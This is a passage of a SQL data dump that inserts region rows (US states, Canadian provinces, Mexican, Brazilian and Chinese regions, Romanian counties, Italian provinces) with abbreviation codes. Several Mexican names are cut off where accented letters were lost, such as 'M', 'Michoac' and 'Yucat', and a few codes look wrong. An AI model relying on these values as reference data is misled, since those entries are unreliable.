00:00:00',0),(30,1,223,0,'New Hampshire','NEH','NH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,223,0,'New Jersey','NEJ','NJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,223,0,'New Mexico','NEM','NM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,223,0,'New York','NEY','NY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,223,0,'North Carolina','NOC','NC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,223,0,'North Dakota','NOD','ND',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(36,1,223,0,'Ohio','OHI','OH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(37,1,223,0,'Oklahoma','OKL','OK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(38,1,223,0,'Oregon','ORN','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(39,1,223,0,'Pennsylvania','PEA','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,223,0,'Rhode Island','RHI','RI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,223,0,'South Carolina','SOC','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,223,0,'South Dakota','SOD','SD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(43,1,223,0,'Tennessee','TEN','TN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,223,0,'Texas','TXS','TX',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(45,1,223,0,'Utah','UTA','UT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,223,0,'Vermont','VMT','VT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,223,0,'Virginia','VIA','VA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(48,1,223,0,'Washington','WAS','WA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,223,0,'West Virginia','WEV','WV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,223,0,'Wisconsin','WIS','WI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(51,1,223,0,'Wyoming','WYO','WY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,38,0,'Alberta','ALB','AB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(53,1,38,0,'British Columbia','BRC','BC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,38,0,'Manitoba','MAB','MB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,38,0,'New Brunswick','NEB','NB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,38,0,'Newfoundland and Labrador','NFL','NL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(57,1,38,0,'Northwest Territories','NWT','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,38,0,'Nova Scotia','NOS','NS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(59,1,38,0,'Nunavut','NUT','NU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,38,0,'Ontario','ONT','ON',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,38,0,'Prince Edward Island','PEI','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,38,0,'Quebec','QEC','QC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,38,0,'Saskatchewan','SAK','SK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,38,0,'Yukon','YUT','YT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,222,0,'England','ENG','EN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(66,1,222,0,'Northern Ireland','NOI','NI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,222,0,'Scotland','SCO','SD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,222,0,'Wales','WLS','WS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,13,0,'Australian Capital Territory','ACT','AC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,13,0,'New South Wales','NSW','NS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(71,1,13,0,'Northern Territory','NOT','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(72,1,13,0,'Queensland','QLD','QL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,13,0,'South Australia','SOA','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(74,1,13,0,'Tasmania','TAS','TS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,13,0,'Victoria','VIC','VI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,13,0,'Western Australia','WEA','WA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,138,0,'Aguascalientes','AGS','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,138,0,'Baja California Norte','BCN','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,138,0,'Baja California Sur','BCS','BS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,138,0,'Campeche','CAM','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,138,0,'Chiapas','CHI','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,138,0,'Chihuahua','CHA','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,138,0,'Coahuila','COA','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,138,0,'Colima','COL','CM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,138,0,'Distrito Federal','DFM','DF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,138,0,'Durango','DGO','DO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,138,0,'Guanajuato','GTO','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(88,1,138,0,'Guerrero','GRO','GU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,138,0,'Hidalgo','HGO','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,138,0,'Jalisco','JAL','JA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(91,1,138,0,'M','EDM','EM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,138,0,'Michoac','MCN','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,138,0,'Morelos','MOR','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,138,0,'Nayarit','NAY','NY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(95,1,138,0,'Nuevo Le','NUL','NL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,138,0,'Oaxaca','OAX','OA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,138,0,'Puebla','PUE','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,138,0,'Quer','QRO','QU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(99,1,138,0,'Quintana Roo','QUR','QR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,138,0,'San Luis Potos','SLP','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(101,1,138,0,'Sinaloa','SIN','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,138,0,'Sonora','SON','SO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(103,1,138,0,'Tabasco','TAB','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(104,1,138,0,'Tamaulipas','TAM','TM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,138,0,'Tlaxcala','TLX','TX',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,138,0,'Veracruz','VER','VZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,138,0,'Yucat','YUC','YU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,138,0,'Zacatecas','ZAC','ZA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,30,0,'Acre','ACR','AC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,30,0,'Alagoas','ALG','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,30,0,'Amapá','AMP','AP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,30,0,'Amazonas','AMZ','AM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,30,0,'Bahía','BAH','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,30,0,'Ceará','CEA','CE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(115,1,30,0,'Distrito Federal','DFB','DF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,30,0,'Espírito Santo','ESS','ES',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,30,0,'Goiás','GOI','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,30,0,'Maranhão','MAR','MA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,30,0,'Mato Grosso','MAT','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,30,0,'Mato Grosso do Sul','MGS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,30,0,'Minas Gerais','MIG','MG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,30,0,'Paraná','PAR','PR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(123,1,30,0,'Paraíba','PRB','PB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,30,0,'Pará','PAB','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,30,0,'Pernambuco','PER','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,30,0,'Piauí','PIA','PI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,30,0,'Rio Grande do Norte','RGN','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,30,0,'Rio Grande do Sul','RGS','RS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(129,1,30,0,'Rio de Janeiro','RDJ','RJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,30,0,'Rondônia','RON','RO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,30,0,'Roraima','ROR','RR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,30,0,'Santa Catarina','SAC','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(133,1,30,0,'Sergipe','SER','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,30,0,'São Paulo','SAP','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,30,0,'Tocantins','TOC','TO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,44,0,'Anhui','ANH','34',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,44,0,'Beijing','BEI','11',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(138,1,44,0,'Chongqing','CHO','50',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,44,0,'Fujian','FUJ','35',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,44,0,'Gansu','GAN','62',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,44,0,'Guangdong','GUA','44',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,44,0,'Guangxi Zhuang','GUZ','45',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(143,1,44,0,'Guizhou','GUI','52',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,44,0,'Hainan','HAI','46',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(145,1,44,0,'Hebei','HEB','13',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(146,1,44,0,'Heilongjiang','HEI','23',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(147,1,44,0,'Henan','HEN','41',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,44,0,'Hubei','HUB','42',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(149,1,44,0,'Hunan','HUN','43',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(150,1,44,0,'Jiangsu','JIA','32',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,44,0,'Jiangxi','JIX','36',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,44,0,'Jilin','JIL','22',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,44,0,'Liaoning','LIA','21',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,44,0,'Nei Mongol','NML','15',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(155,1,44,0,'Ningxia Hui','NIH','64',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,44,0,'Qinghai','QIN','63',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(157,1,44,0,'Shandong','SNG','37',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,44,0,'Shanghai','SHH','31',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,44,0,'Shaanxi','SHX','61',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,44,0,'Sichuan','SIC','51',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,44,0,'Tianjin','TIA','12',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,44,0,'Xinjiang Uygur','XIU','65',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,44,0,'Xizang','XIZ','54',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,44,0,'Yunnan','YUN','53',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,44,0,'Zhejiang','ZHE','33',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,104,0,'Israel','ISL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,104,0,'Gaza Strip','GZS','GZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,104,0,'West Bank','WBK','WB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,151,0,'St. Maarten','STM','SM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,151,0,'Bonaire','BNR','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,151,0,'Curacao','CUR','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,175,0,'Alba','ABA','AB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,175,0,'Arad','ARD','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,175,0,'Arges','ARG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,175,0,'Bacau','BAC','BC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,175,0,'Bihor','BIH','BH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,175,0,'Bistrita-Nasaud','BIS','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,175,0,'Botosani','BOT','BT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,175,0,'Braila','BRL','BR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,175,0,'Brasov','BRA','BV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,175,0,'Bucuresti','BUC','B',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,175,0,'Buzau','BUZ','BZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,175,0,'Calarasi','CAL','CL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,175,0,'Caras Severin','CRS','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,175,0,'Cluj','CLJ','CJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,175,0,'Constanta','CST','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,175,0,'Covasna','COV','CV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,175,0,'Dambovita','DAM','DB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,175,0,'Dolj','DLJ','DJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,175,0,'Galati','GAL','GL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,175,0,'Giurgiu','GIU','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,175,0,'Gorj','GOR','GJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,175,0,'Hargita','HRG','HR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,175,0,'Hunedoara','HUN','HD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,175,0,'Ialomita','IAL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,175,0,'Iasi','IAS','IS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,175,0,'Ilfov','ILF','IF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,175,0,'Maramures','MAR','MM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,175,0,'Mehedinti','MEH','MH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,175,0,'Mures','MUR','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,175,0,'Neamt','NEM','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(202,1,175,0,'Olt','OLT','OT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(203,1,175,0,'Prahova','PRA','PH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(204,1,175,0,'Salaj','SAL','SJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(205,1,175,0,'Satu Mare','SAT','SM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(206,1,175,0,'Sibiu','SIB','SB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(207,1,175,0,'Suceava','SUC','SV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(208,1,175,0,'Teleorman','TEL','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(209,1,175,0,'Timis','TIM','TM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(210,1,175,0,'Tulcea','TUL','TL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(211,1,175,0,'Valcea','VAL','VL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(212,1,175,0,'Vaslui','VAS','VS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(213,1,175,0,'Vrancea','VRA','VN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(214,1,105,0,'Agrigento','AGR','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(215,1,105,0,'Alessandria','ALE','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(216,1,105,0,'Ancona','ANC','AN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(217,1,105,0,'Aosta','AOS','AO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(218,1,105,0,'Arezzo','ARE','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(219,1,105,0,'Ascoli Piceno','API','AP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(220,1,105,0,'Asti','AST','AT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(221,1,105,0,'Avellino','AVE','AV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(222,1,105,0,'Bari','BAR','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(223,1,105,0,'Belluno','BEL','BL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(224,1,105,0,'Benevento','BEN','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 